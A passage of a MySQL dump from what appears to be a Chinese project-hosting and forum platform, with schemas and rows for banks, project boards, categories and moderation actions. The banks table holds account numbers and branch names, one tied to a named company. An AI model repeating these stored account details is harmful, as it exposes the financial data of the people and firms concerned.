PRIMARY KEY (`id`),
|
||
KEY `user` (`user_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `attendances`
|
||
--
|
||
|
||
LOCK TABLES `attendances` WRITE;
|
||
/*!40000 ALTER TABLE `attendances` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `attendances` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `auth_sources`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `auth_sources`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `auth_sources` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`type` varchar(30) NOT NULL DEFAULT '',
|
||
`name` varchar(60) NOT NULL DEFAULT '',
|
||
`host` varchar(60) DEFAULT NULL,
|
||
`port` int(11) DEFAULT NULL,
|
||
`account` varchar(255) DEFAULT NULL,
|
||
`account_password` varchar(255) DEFAULT '',
|
||
`base_dn` varchar(255) DEFAULT NULL,
|
||
`attr_login` varchar(30) DEFAULT NULL,
|
||
`attr_firstname` varchar(30) DEFAULT NULL,
|
||
`attr_lastname` varchar(30) DEFAULT NULL,
|
||
`attr_mail` varchar(30) DEFAULT NULL,
|
||
`onthefly_register` tinyint(1) NOT NULL DEFAULT '0',
|
||
`tls` tinyint(1) NOT NULL DEFAULT '0',
|
||
`filter` varchar(255) DEFAULT NULL,
|
||
`timeout` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_auth_sources_on_id_and_type` (`id`,`type`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `auth_sources`
|
||
--
|
||
|
||
LOCK TABLES `auth_sources` WRITE;
|
||
/*!40000 ALTER TABLE `auth_sources` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `auth_sources` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `authentications`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `authentications`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `authentications` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`level` tinyint(4) DEFAULT NULL,
|
||
`permissions` text,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `authentications`
|
||
--
|
||
|
||
LOCK TABLES `authentications` WRITE;
|
||
/*!40000 ALTER TABLE `authentications` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `authentications` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `authentications_users`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `authentications_users`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `authentications_users` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`authentication_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `authentications_users`
|
||
--
|
||
|
||
LOCK TABLES `authentications_users` WRITE;
|
||
/*!40000 ALTER TABLE `authentications_users` DISABLE KEYS */;
|
||
INSERT INTO `authentications_users` VALUES (1,1,1);
|
||
/*!40000 ALTER TABLE `authentications_users` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `banks`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `banks`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `banks` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`username` varchar(255) DEFAULT NULL,
|
||
`number` varchar(255) DEFAULT NULL,
|
||
`branch_name` varchar(255) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
UNIQUE KEY `index_banks_on_number` (`number`),
|
||
KEY `index_banks_on_username` (`username`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `banks`
|
||
--
|
||
|
||
LOCK TABLES `banks` WRITE;
|
||
/*!40000 ALTER TABLE `banks` DISABLE KEYS */;
|
||
INSERT INTO `banks` VALUES (1,'2','xamppp','44444444444','长沙天河支行',47,'2019-08-06 09:55:08','2019-08-06 09:55:08'),(2,'1','q','111','北京银行',49,'2019-08-07 09:35:48','2019-08-07 09:35:48'),(3,'5','SS','111333','CC',50,'2019-08-07 14:57:23','2019-08-07 14:57:27'),(4,'1','ZX','1212334423231122555','天河支行',51,'2019-08-07 15:00:06','2019-08-07 15:00:06'),(5,'1','adf','123456789987654321','asdf',182,'2021-02-25 08:52:26','2021-02-25 08:52:26'),(6,'4','青岛数智船海科技有限公司','37150199780600001301','青岛黄岛支行',203,'2021-03-05 13:14:54','2021-03-05 13:14:54');
|
||
/*!40000 ALTER TABLE `banks` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `banned_forums`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `banned_forums`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `banned_forums` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`author_id` int(11) DEFAULT NULL,
|
||
`memo_id` int(11) DEFAULT NULL,
|
||
`banned_count` int(11) DEFAULT '0',
|
||
`is_banned` tinyint(1) DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_banned_forums_on_user_id_and_memo_id` (`user_id`,`memo_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `banned_forums`
|
||
--
|
||
|
||
LOCK TABLES `banned_forums` WRITE;
|
||
/*!40000 ALTER TABLE `banned_forums` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `banned_forums` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `block_users`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `block_users`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `block_users` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`block_user_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_block_users_on_user_id` (`user_id`),
|
||
KEY `index_block_users_on_block_user_id` (`block_user_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=20 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `block_users`
|
||
--
|
||
|
||
LOCK TABLES `block_users` WRITE;
|
||
/*!40000 ALTER TABLE `block_users` DISABLE KEYS */;
|
||
INSERT INTO `block_users` VALUES (11,111,49,'2020-08-10 18:04:46','2020-08-10 18:04:46'),(19,111,1,'2020-08-17 10:59:45','2020-08-17 10:59:45');
|
||
/*!40000 ALTER TABLE `block_users` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `boards`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `boards`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `boards` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) NOT NULL,
|
||
`name` varchar(255) NOT NULL DEFAULT '',
|
||
`description` varchar(255) DEFAULT NULL,
|
||
`position` int(11) DEFAULT '1',
|
||
`topics_count` int(11) NOT NULL DEFAULT '0',
|
||
`messages_count` int(11) NOT NULL DEFAULT '0',
|
||
`last_message_id` int(11) DEFAULT NULL,
|
||
`parent_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `boards_project_id` (`project_id`),
|
||
KEY `index_boards_on_last_message_id` (`last_message_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=271 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `boards`
|
||
--
|
||
|
||
LOCK TABLES `boards` WRITE;
|
||
/*!40000 ALTER TABLE `boards` DISABLE KEYS */;
|
||
INSERT INTO `boards` VALUES (25,25,' 项目讨论区','Markdown-Here',1,0,0,NULL,NULL),(28,28,' Project-borad','libopencm3',1,0,0,NULL,NULL),(29,29,' Project-borad','mini-arm-os',1,0,0,NULL,NULL),(31,31,' Project-borad','zephyr',1,0,0,NULL,NULL),(32,32,' 项目讨论区','openstack',1,0,0,NULL,NULL),(34,34,' Project-borad','hadoop',1,0,0,NULL,NULL),(38,38,' Project-borad','ArmsComponent',1,0,0,NULL,NULL),(41,41,' 项目讨论区','arminject',1,0,0,NULL,NULL),(42,42,' 项目讨论区','armpwn',1,0,0,NULL,NULL),(43,43,' 项目讨论区','ARMClient',1,0,0,NULL,NULL),(54,54,' Project-borad','adb-arm',1,0,0,NULL,NULL),(57,57,' 项目讨论区','meArm',1,0,0,NULL,NULL),(58,58,' 项目讨论区','tensorflow-on-arm',1,0,0,NULL,NULL),(59,59,' 项目讨论区','spec_poc_arm',1,0,0,NULL,NULL),(60,60,' 项目讨论区','bare-metal-arm',1,0,0,NULL,NULL),(61,61,' 项目讨论区','exploit_me',1,0,0,NULL,NULL),(62,62,' 项目讨论区','exfat-nofuse',1,0,0,NULL,NULL),(63,63,' 项目讨论区','crosstool-arm-osx',1,0,0,NULL,NULL),(64,64,' 项目讨论区','exploit-exercises-arm',1,0,0,NULL,NULL),(65,65,' 项目讨论区','summon-arm-toolchain',1,0,0,NULL,NULL),(66,66,' 项目讨论区','train-robot-arm-from-scratch',1,0,0,NULL,NULL),(67,67,' 项目讨论区','ARM-toolchain-vagrant',1,0,0,NULL,NULL),(69,69,' 项目讨论区','servicecomb-saga',1,0,0,NULL,NULL),(70,70,' 项目讨论区','Anokoro',1,0,0,NULL,NULL),(73,73,' 项目讨论区','vaeThink',1,0,0,NULL,NULL),(76,76,' Project-borad','Sagecal',1,0,0,NULL,NULL),(78,78,' 项目讨论区','Casacore',1,0,0,NULL,NULL),(79,79,' 项目讨论区','CarbonData',1,0,0,NULL,NULL),(80,80,' 项目讨论区','poise-python',1,0,0,NULL,NULL),(81,81,' 项目讨论区','poise-python2',1,0,0,NULL,NULL),(82,82,' 项目讨论区','A Chef cookbook to provide',1,0,0,NULL,NULL),(99,99,' 项目讨论区','Markdown中文版编辑器',1,0,0,NULL,NULL),(100,100,' 项目讨论区','DemoPlus',1,0,0,NULL,NULL),(101,101,' 项目讨论区','可控开源社区1.0',1,0,0,NULL,NULL),(102,102,' 项目讨论区','可控开源社区1.0',1,0,0,NULL,NULL),(103,103,' 项目讨论区','可控开源社区1.0',1,0,0,NULL,NULL),(120,120,' 项目讨论区','Parallel Distributed Gazebo',1,0,0,NULL,NULL),(127,127,' Project-borad','基于RISCV指令集的嵌入式低功耗芯片',1,0,0,NULL,NULL),(129,129,' 项目讨论区','Gazebo_Distributed',1,0,0,NULL,NULL),(130,130,' Project-borad','Gazebo-exercise',1,0,0,NULL,NULL),(131,131,' 项目讨论区','可控开源社区',1,0,0,NULL,NULL),(132,132,' 项目讨论区','对抗性人工智能应对策略及算法研究',1,0,0,NULL,NULL),(137,137,' 项目讨论区','hector_quadrotor',1,0,0,NULL,NULL),(139,139,' 项目讨论区','meta-ros',1,0,0,NULL,NULL),(140,140,' 项目讨论区','att_ekf',1,0,0,NULL,NULL),(141,141,' 项目讨论区','cylon',1,0,0,NULL,NULL),(143,143,' 项目讨论区','AirSim',1,0,0,NULL,NULL),(144,144,' 项目讨论区','ros',1,0,0,NULL,NULL),(151,156,' 项目讨论区','chartkick',1,0,0,NULL,NULL),(152,157,' 项目讨论区','action-store',1,0,0,NULL,NULL),(153,158,' 项目讨论区','redux-scc',1,0,0,NULL,NULL),(154,159,' 项目讨论区','redux-bluetooth',1,0,0,NULL,NULL),(156,161,' 项目讨论区','ros研发',1,0,0,NULL,NULL),(164,169,' 项目讨论区','Ruby Study1.0',1,0,0,NULL,NULL),(173,178,' 项目讨论区','wblog',1,0,0,NULL,NULL),(194,199,' 项目讨论区','基于RISCV指令集的嵌入式低功耗芯片',1,0,0,NULL,NULL),(195,200,' 项目讨论区','基于RISCV指令集的嵌入式低功耗芯片',1,0,0,NULL,NULL),(198,203,' 项目讨论区','aaa',1,0,0,NULL,NULL),(199,204,' 项目讨论区','gg',1,0,0,NULL,NULL),(200,205,' 项目讨论区','hh',1,0,0,NULL,NULL),(212,217,' 项目讨论区','goMonitorLog',1,0,0,NULL,NULL),(214,219,' 项目讨论区','rCore的在线运行机制的控制与解析',1,0,0,NULL,NULL),(216,221,' 项目讨论区','DeFiBus',1,0,0,NULL,NULL),(218,223,' 项目讨论区','gopub',1,0,0,NULL,NULL),(219,224,' 项目讨论区','基于RISCV指令集的嵌入式低功耗芯片',1,0,0,NULL,NULL),(220,225,' 项目讨论区','wblog',1,0,0,NULL,NULL),(221,226,' 项目讨论区','基于RISCV指令集的嵌入式低功耗芯片',1,0,0,NULL,NULL),(223,228,' 项目讨论区','wblog',1,0,0,NULL,NULL),(225,230,' 项目讨论区','可控开源社区1.0',1,0,0,NULL,NULL),(226,231,' 项目讨论区','cylon',1,0,0,NULL,NULL),(227,232,' 项目讨论区','基于RISCV指令集的嵌入式低功耗芯片2',1,0,0,NULL,NULL),(228,233,' 项目讨论区','基于RISCV指令集的嵌入式低功耗芯片2',1,0,0,NULL,NULL),(243,248,' 项目讨论区','基于RISCV指令集的嵌入式低功耗芯片',1,0,0,NULL,NULL),(245,250,' 项目讨论区','基于RISCV指令集的嵌入式低功耗芯片2',1,0,0,NULL,NULL),(246,251,' 项目讨论区','团队协同开发',1,0,0,NULL,NULL),(247,252,' 项目讨论区','团队托管项目申请',1,0,0,NULL,NULL),(248,253,' 项目讨论区','基于RISCV指令集的嵌入式低功耗芯片2',1,0,0,NULL,NULL),(249,254,' 项目讨论区','Test project',1,0,0,NULL,NULL),(250,255,' 项目讨论区','micROS',1,0,0,NULL,NULL),(251,256,' 项目讨论区','代码克隆检测',1,0,0,NULL,NULL),(252,257,' 项目讨论区','代码克隆检测2',1,0,0,NULL,NULL),(253,258,' 项目讨论区','Hnice',1,0,0,NULL,NULL),(254,259,' 项目讨论区','风大发送短发的说法',1,0,0,NULL,NULL),(256,261,' 项目讨论区','opensbi',1,0,0,NULL,NULL),(257,262,' 项目讨论区','meta-riscv',1,0,0,NULL,NULL),(258,263,' 项目讨论区','riscv-tools',1,0,0,NULL,NULL),(259,264,' 项目讨论区','riscv-gnu-toolchain',1,0,0,NULL,NULL),(260,265,' 项目讨论区','hello',1,0,0,NULL,NULL),(261,266,' 项目讨论区','repo_demo',1,0,0,NULL,NULL),(262,267,' 项目讨论区','sequelize',1,0,0,NULL,NULL),(263,268,' 项目讨论区','quickd',1,0,0,NULL,NULL),(264,269,' 项目讨论区','基于RISCV指令集的嵌入式低功耗芯片2',1,0,0,NULL,NULL),(265,270,' 项目讨论区','这是托管项目的测试',1,0,0,NULL,NULL),(266,271,' 项目讨论区','orange',1,0,0,NULL,NULL),(267,272,' Project-borad','团队协同开发',1,0,0,NULL,NULL),(268,273,' 项目讨论区','马赛克战理论研究协同攻关',1,0,0,NULL,NULL),(269,274,' 项目讨论区','CCR',1,0,0,NULL,NULL),(270,275,' 项目讨论区','ast',1,0,0,NULL,NULL);
|
||
/*!40000 ALTER TABLE `boards` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `bug_to_osps`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `bug_to_osps`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `bug_to_osps` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`osp_id` int(11) DEFAULT NULL,
|
||
`relative_memo_id` int(11) DEFAULT NULL,
|
||
`description` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `bug_to_osps`
|
||
--
|
||
|
||
LOCK TABLES `bug_to_osps` WRITE;
|
||
/*!40000 ALTER TABLE `bug_to_osps` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `bug_to_osps` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `categories`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `categories`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `categories` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) NOT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`position` int(11) DEFAULT '1000',
|
||
`tasks_count` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_categories_on_name` (`name`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `categories`
|
||
--
|
||
|
||
LOCK TABLES `categories` WRITE;
|
||
/*!40000 ALTER TABLE `categories` DISABLE KEYS */;
|
||
INSERT INTO `categories` VALUES (1,'军事理论','2019-08-05 16:00:02','2019-08-06 10:35:45',1,1),(2,'政策法规','2019-08-05 16:00:02','2019-08-26 10:25:45',2,1),(3,'医学','2019-08-05 16:00:02','2019-08-26 10:25:45',3,1),(4,'电子','2019-08-05 16:00:02','2019-08-06 10:35:45',4,0),(5,'通信','2019-08-05 16:00:02','2019-08-06 10:35:45',5,6),(6,'计算机科学','2019-08-05 16:00:02','2019-08-26 10:26:04',9,14),(7,'软件工程','2019-08-05 16:00:02','2019-11-22 15:45:15',11,53),(8,'有机化学','2019-08-14 08:50:26','2019-08-26 10:26:00',7,0),(9,'人工智能','2019-08-23 12:54:42','2019-11-22 15:45:15',10,5),(10,'文学交流','2019-08-23 15:12:11','2019-08-26 10:25:36',6,1),(12,'体育活动','2019-08-26 10:24:22','2019-08-26 10:26:04',8,5);
|
||
/*!40000 ALTER TABLE `categories` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `changes`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `changes`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `changes` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`changeset_id` int(11) NOT NULL,
|
||
`action` varchar(1) NOT NULL DEFAULT '',
|
||
`path` text NOT NULL,
|
||
`from_path` text,
|
||
`from_revision` varchar(255) DEFAULT NULL,
|
||
`revision` varchar(255) DEFAULT NULL,
|
||
`branch` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `changesets_changeset_id` (`changeset_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `changes`
|
||
--
|
||
|
||
LOCK TABLES `changes` WRITE;
|
||
/*!40000 ALTER TABLE `changes` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `changes` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `changeset_parents`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `changeset_parents`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `changeset_parents` (
|
||
`changeset_id` int(11) NOT NULL,
|
||
`parent_id` int(11) NOT NULL,
|
||
KEY `changeset_parents_changeset_ids` (`changeset_id`),
|
||
KEY `changeset_parents_parent_ids` (`parent_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `changeset_parents`
|
||
--
|
||
|
||
LOCK TABLES `changeset_parents` WRITE;
|
||
/*!40000 ALTER TABLE `changeset_parents` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `changeset_parents` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `changesets`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `changesets`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `changesets` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`repository_id` int(11) NOT NULL,
|
||
`revision` varchar(255) NOT NULL,
|
||
`committer` varchar(255) DEFAULT NULL,
|
||
`committed_on` datetime NOT NULL,
|
||
`comments` text,
|
||
`commit_date` date DEFAULT NULL,
|
||
`scmid` varchar(255) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
UNIQUE KEY `changesets_repos_rev` (`repository_id`,`revision`),
|
||
KEY `index_changesets_on_user_id` (`user_id`),
|
||
KEY `index_changesets_on_repository_id` (`repository_id`),
|
||
KEY `index_changesets_on_committed_on` (`committed_on`),
|
||
KEY `changesets_repos_scmid` (`repository_id`,`scmid`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `changesets`
|
||
--
|
||
|
||
LOCK TABLES `changesets` WRITE;
|
||
/*!40000 ALTER TABLE `changesets` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `changesets` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `changesets_issues`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `changesets_issues`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `changesets_issues` (
|
||
`changeset_id` int(11) NOT NULL,
|
||
`issue_id` int(11) NOT NULL,
|
||
UNIQUE KEY `changesets_issues_ids` (`changeset_id`,`issue_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `changesets_issues`
|
||
--
|
||
|
||
LOCK TABLES `changesets_issues` WRITE;
|
||
/*!40000 ALTER TABLE `changesets_issues` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `changesets_issues` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `checked_actions`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `checked_actions`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `checked_actions` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`action_type` varchar(255) DEFAULT NULL,
|
||
`action_at` datetime DEFAULT NULL,
|
||
`checkable_id` int(11) DEFAULT NULL,
|
||
`checkable_type` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_checked_actions_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=201 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `checked_actions`
|
||
--
|
||
|
||
LOCK TABLES `checked_actions` WRITE;
|
||
/*!40000 ALTER TABLE `checked_actions` DISABLE KEYS */;
|
||
INSERT INTO `checked_actions` VALUES (1,50,'refuse','2020-01-10 14:04:51',240,'Memo','2020-01-10 14:04:51','2020-01-10 14:04:51'),(2,50,'refuse','2020-01-10 14:04:55',241,'Memo','2020-01-10 14:04:55','2020-01-10 14:04:55'),(3,50,'refuse','2020-01-10 14:04:57',239,'Memo','2020-01-10 14:04:57','2020-01-10 14:04:57'),(4,50,'refuse','2020-01-10 14:04:58',238,'Memo','2020-01-10 14:04:58','2020-01-10 14:04:58'),(5,50,'refuse','2020-01-10 14:04:58',237,'Memo','2020-01-10 14:04:58','2020-01-10 14:04:58'),(6,50,'refuse','2020-01-10 14:04:59',236,'Memo','2020-01-10 14:04:59','2020-01-10 14:04:59'),(7,50,'refuse','2020-01-10 14:05:00',235,'Memo','2020-01-10 14:05:00','2020-01-10 14:05:00'),(8,50,'refuse','2020-01-10 14:05:01',234,'Memo','2020-01-10 14:05:01','2020-01-10 14:05:01'),(9,50,'refuse','2020-01-10 14:05:02',233,'Memo','2020-01-10 14:05:02','2020-01-10 14:05:02'),(10,50,'refuse','2020-01-10 14:05:02',232,'Memo','2020-01-10 14:05:02','2020-01-10 14:05:02'),(11,50,'refuse','2020-01-10 14:05:04',230,'Memo','2020-01-10 14:05:04','2020-01-10 14:05:04'),(12,50,'refuse','2020-01-10 14:05:05',231,'Memo','2020-01-10 14:05:05','2020-01-10 14:05:05'),(13,46,'passed','2020-02-11 16:17:53',281,'Memo','2020-02-11 16:17:53','2020-02-11 16:17:53'),(14,46,'passed','2020-02-11 17:36:57',280,'Memo','2020-02-11 17:36:57','2020-02-11 17:36:57'),(15,1,'passed','2020-02-13 15:42:29',282,'Memo','2020-02-13 15:42:29','2020-02-13 15:42:29'),(16,1,'refuse','2020-02-13 15:44:11',282,'Memo','2020-02-13 15:44:11','2020-02-13 15:44:11'),(17,1,'passed','2020-06-16 16:05:57',286,'Memo','2020-06-16 16:05:57','2020-06-16 16:05:57'),(18,1,'passed','2020-06-16 16:05:58',285,'Memo','2020-06-16 16:05:58','2020-06-16 16:05:58'),(19,1,'passed','2020-06-16 16:06:00',284,'Memo','2020-06-16 16:06:00','2020-06-16 16:06:00'),(20,1,'passed','2020-06-16 16:06:01',283,'Memo','2020-06-16 16:06:01','2020-06-16 16:06:01'),(21,1,'passed','2020-06-16 16:06:02',274,'Memo','2020-06-16 16:06:02','2020-06-16 16:06:02'),(22,1,'passed','2020-06-16 16:06:03',273,'Memo','2020-06-16 16:06:03','2020-06-16 16:06:03'),(23,1,'passed','2020-06-16 16:06:04',272,'Memo','2020-06-16 16:06:04','2020-06-16 16:06:04'),(24,1,'passed','2020-06-16 16:06:05',271,'Memo','2020-06-16 16:06:05','2020-06-16 16:06:05'),(25,1,'passed','2020-06-16 16:08:13',288,'Memo','2020-06-16 16:08:13','2020-06-16 16:08:13'),(26,1,'passed','2020-06-16 16:08:14',287,'Memo','2020-06-16 16:08:14','2020-06-16 16:08:14'),(27,1,'passed','2020-06-17 15:21:32',291,'Memo','2020-06-17 15:21:32','2020-06-17 15:21:32'),(28,1,'passed','2020-06-17 15:21:33',290,'Memo','2020-06-17 15:21:33','2020-06-17 15:21:33'),(29,1,'passed','2020-06-17 15:21:34',289,'Memo','2020-06-17 15:21:34','2020-06-17 15:21:34'),(30,1,'refuse','2020-06-17 15:21:50',291,'Memo','2020-06-17 15:21:50','2020-06-17 15:21:50'),(31,1,'passed','2020-06-17 15:22:04',291,'Memo','2020-06-17 15:22:04','2020-06-17 15:22:04'),(32,111,'passed','2020-07-08 17:53:53',293,'Memo','2020-07-08 17:53:53','2020-07-08 17:53:53'),(33,111,'refuse','2020-07-08 17:53:55',293,'Memo','2020-07-08 17:53:55','2020-07-08 17:53:55'),(34,111,'passed','2020-07-08 17:53:57',293,'Memo','2020-07-08 17:53:57','2020-07-08 17:53:57'),(35,111,'passed','2020-07-08 19:02:12',297,'Memo','2020-07-08 19:02:12','2020-07-08 19:02:12'),(36,46,'passed','2020-08-10 08:50:02',307,'Memo','2020-08-10 08:50:02','2020-08-10 08:50:02'),(37,46,'passed','2020-08-10 08:50:04',306,'Memo','2020-08-10 08:50:04','2020-08-10 